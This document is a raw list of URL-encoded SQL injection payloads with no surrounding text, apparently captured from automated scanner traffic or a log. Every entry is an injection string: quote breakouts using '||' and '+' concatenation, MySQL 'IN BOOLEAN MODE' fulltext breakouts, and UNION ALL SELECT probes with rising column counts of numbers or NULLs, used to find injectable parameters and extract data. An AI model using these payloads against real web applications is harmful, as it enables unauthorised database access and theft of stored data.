-7045%27%7C%7C%28SELECT%20%27WUEg%27%20FROM%20DUAL%20WHERE%209407%3D9407%20UNION%20ALL%20SELECT%209407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407%2C9407--%20 -8102%27%7C%7C%28SELECT%20%27JeDg%27%20FROM%20DUAL%20WHERE%205216%3D5216%20UNION%20ALL%20SELECT%205216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216%2C5216--%20 -3590%27%7C%7C%28SELECT%20%27gPLm%27%20FROM%20DUAL%20WHERE%205996%3D5996%20UNION%20ALL%20SELECT%205996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996%2C5996--%20 -8266%27%7C%7C%28SELECT%20%27iaCA%27%20FROM%20DUAL%20WHERE%201423%3D1423%20UNION%20ALL%20SELECT%201423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423%2C1423--%20 -4601%27%7C%7C%28SELECT%20%27Rokm%27%20FROM%20DUAL%20WHERE%207772%3D7772%20UNION%20ALL%20SELECT%207772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772%2C7772--%20 -9779%27%7C%7C%28SELECT%20%27YGqS%27%20FROM%20DUAL%20WHERE%204545%3D4545%20UNION%20ALL%20SELECT%204545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545%2C4545--%20 -4035%27%7C%7C%28SELECT%20%27GBwJ%27%20WHERE%201537%3D1537%20UNION%20ALL%20SELECT%201537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537--%20 -4379%27%7C%7C%28SELECT%20%27aoOB%27%20WHERE%202305%3D2305%20UNION%20ALL%20SELECT%202305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305%2C2305--%20 -8023%27%7C%7C%28SELECT%20%27nSYh%27%20WHERE%207567%3D7567%20UNION%20ALL%20SELECT%207567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567%2C7567--%20 -5114%27%7C%7C%28SELECT%20%27iRFP%27%20WHERE%206334%3D6334%20UNION%20ALL%20SELECT%206334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334%2C6334--%20 -4090%27%7C%7C%28SELECT%20%27DuRn%27%20WHERE%205434%3D5434%20UNION%20ALL%20SELECT%205434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434%2C5434--%20 -4267%27%7C%7C%28SELECT%20%27nwdu%27%20WHERE%203456%3D3456%20UNION%20ALL%20SELECT%203456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456%2C3456--%20 -7639%27%7C%7C%28SELECT%20%27WSGg%27%20WHERE%202472%3D2472%20UNION%20ALL%20SELECT%202472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472--%20 -6761%27%7C%7C%28SELECT%20%27EdVm%27%20WHERE%203334%3D3334%20UNION%20ALL%20SELECT%203334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334%2C3334--%20 -4300%27%7C%7C%28SELECT%20%27yBVb%27%20WHERE%206520%3D6520%20UNION%20ALL%20SELECT%206520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520%2C6520--%20 -5596%27%7C%7C%28SELECT%20%27QNLs%27%20WHERE%202217%3D2217%20UNION%20ALL%20SELECT%202217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217%2C2217--%20 -9039%27%2B%28SELECT%20iVkw%20WHERE%202836%3D2836%20UNION%20ALL%20SELECT%202836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836%2C2836--%20 -9225%27%2B%28SELECT%20PJBo%20WHERE%208281%3D8281%20UNION%20ALL%20SELECT%208281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281%2C8281--%20 -8241%27%2B%28SELECT%20RHCI%20WHERE%201930%3D1930%20UNION%20ALL%20SELECT%201930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930%2C1930--%20 -3550%27%2B%28SELECT%20WNTH%20WHERE%205076%3D5076%20UNION%20ALL%20SELECT%205076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076%2C5076--%20 -3403%27%2B%28SELECT%20XDtb%20WHERE%201979%3D1979%20UNION%20ALL%20SELECT%201979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979%2C1979--%20 -1080%27%2B%28SELECT%20YvdQ%20WHERE%208972%3D8972%20UNION%20ALL%20SELECT%208972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972%2C8972--%20 -3854%27%2B%28SELECT%20AYXH%20WHERE%209745%3D9745%20UNION%20ALL%20SELECT%209745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745%2C9745--%20 -9912%27%2B%28SELECT%20NgeP%20WHERE%202036%3D2036%20UNION%20ALL%20SELECT%202036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036%2C2036--%20 -3291%27%2B%28SELECT%20dLir%20WHERE%204806%3D4806%20UNION%20ALL%20SELECT%204806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806%2C4806--%20 -5151%27%2B%28SELECT%20kLjP%20WHERE%202988%3D2988%20UNION%20ALL%20SELECT%202988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988%2C2988--%20 -4007%27%2B%28SELECT%20%27Cfor%27%20WHERE%209518%3D9518%20UNION%20ALL%20SELECT%209518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518%2C9518--%20 -4292%27%2B%28SELECT%20%27olLn%27%20WHERE%204562%3D4562%20UNION%20ALL%20SELECT%204562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562%2C4562--%20 -8480%27%2B%28SELECT%20%27gfmu%27%20WHERE%208885%3D8885%20UNION%20ALL%20SELECT%208885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885%2C8885--%20 -8703%27%2B%28SELECT%20%27vHUj%27%20WHERE%207105%3D7105%20UNION%20ALL%20SELECT%207105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105%2C7105--%20 -1570%27%2B%28SELECT%20%27cbOA%27%20WHERE%202240%3D2240%20UNION%20ALL%20SELECT%202240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240%2C2240--%20 -2443%27%2B%28SELECT%20%27BdIG%27%20WHERE%208396%3D8396%20UNION%20ALL%20SELECT%208396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396%2C8396--%20 -2624%27%2B%28SELECT%20%27oULU%27%20WHERE%204212%3D4212%20UNION%20ALL%20SELECT%204212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212%2C4212--%20 -7525%27%2B%28SELECT%20%27ubXx%27%20WHERE%203415%3D3415%20UNION%20ALL%20SELECT%203415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415%2C3415--%20 -4208%27%2B%28SELECT%20%27oNcN%27%20WHERE%201873%3D1873%20UNION%20ALL%20SELECT%201873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873%2C1873--%20 -1524%27%2B%28SELECT%20%27HaHv%27%20WHERE%203910%3D3910%20UNION%20ALL%20SELECT%203910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910%2C3910--%20 -3906%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%203072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072%2C3072--%20 -2322%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081%2C9081--%20 -4048%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%205846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846%2C5846--%20 -8598%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%208997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997%2C8997--%20 -2648%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395%2C2395--%20 -6685%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277%2C9277--%20 -2179%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%207267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267%2C7267--%20 -8972%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%202977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977%2C2977--%20 -8250%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%204401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401%2C4401--%20 -2714%27%20IN%20BOOLEAN%20MODE%29%20UNION%20ALL%20SELECT%209546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546%2C9546--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 